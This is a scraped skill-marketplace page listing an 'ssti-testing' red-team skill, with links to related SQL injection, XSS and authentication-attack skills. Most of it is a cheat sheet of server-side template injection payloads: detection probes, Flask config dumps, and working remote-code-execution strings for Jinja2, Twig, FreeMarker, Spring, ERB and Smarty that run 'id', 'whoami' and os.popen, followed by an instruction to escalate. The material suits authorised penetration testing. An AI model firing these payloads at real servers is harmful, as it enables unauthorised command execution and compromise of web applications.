一键导入
ssti-testing
Server-side template injection detection, engine identification, and RCE
用 Codex 或 Claude 帮你安装 复制这段 Prompt,粘贴到 Codex、Claude 或其他助手里,让它检查 Skill 页面并帮你完成安装。
菜单
Server-side template injection detection, engine identification, and RCE
用 Codex 或 Claude 帮你安装 复制这段 Prompt,粘贴到 Codex、Claude 或其他助手里,让它检查 Skill 页面并帮你完成安装。
基于 SOC 职业分类
Business logic vulnerability detection — workflow bypass, price manipulation, state abuse, and application-specific flaws
Detect PII, credentials, and corporate sensitive data in API responses, source code, files, headers, and database extracts
Detect and exploit SQL injection vulnerabilities in web application parameters
Test for authentication and authorization flaws including credential attacks, session issues, and access control bypasses
Detect and exploit cross-site scripting vulnerabilities in web applications
Discover hidden parameters, test values, and identify input handling anomalies
| name | ssti-testing |
| description | Server-side template injection detection, engine identification, and RCE |
| origin | RedteamOpencode |
{{7*7}} — look for 49 in response${7*7}, <%= 7*7 %>, #{7*7}, {7*7}, [= 7*7 ]{{'foo'+'bar'}} → foobar${{<%[%'"}}%\. — observe which causes errors{{config}} — dumps Flask config{{config.items()}} — enumerate settings{{self.__class__.__mro__}} — MRO chain{{request.application.__globals__}}{{_self.env.getFilter('id')}} (Twig <2){{['id']|filter('system')}} (Twig 3){{app.request.server.all|join(',')}} — server vars${7*7} → 49<#assign ex="freemarker.template.utility.Execute"?new()>${ex("id")}${object.class.forName("java.lang.Runtime")}{% set cmd = 'id' %}{% set bytes = (1).TYPE.forName('java.lang.Runtime').methods[6].invoke(null,null).exec(cmd) %}__${T(java.lang.Runtime).getRuntime().exec('id')}__::.x<%= 7*7 %> → 49<%= system('id') %><%= id %>{php}echo id;{/php} (Smarty <3){system('id')}{{config.__class__.__init__.__globals__['os'].popen('id').read()}}{{['id']|filter('system')}}<#assign ex="freemarker.template.utility.Execute"?new()>${ex("id")}<%= whoami %>id, whoami, then escalatesubprocess.Popen or os.popen__subclasses__(), __globals__, __builtins__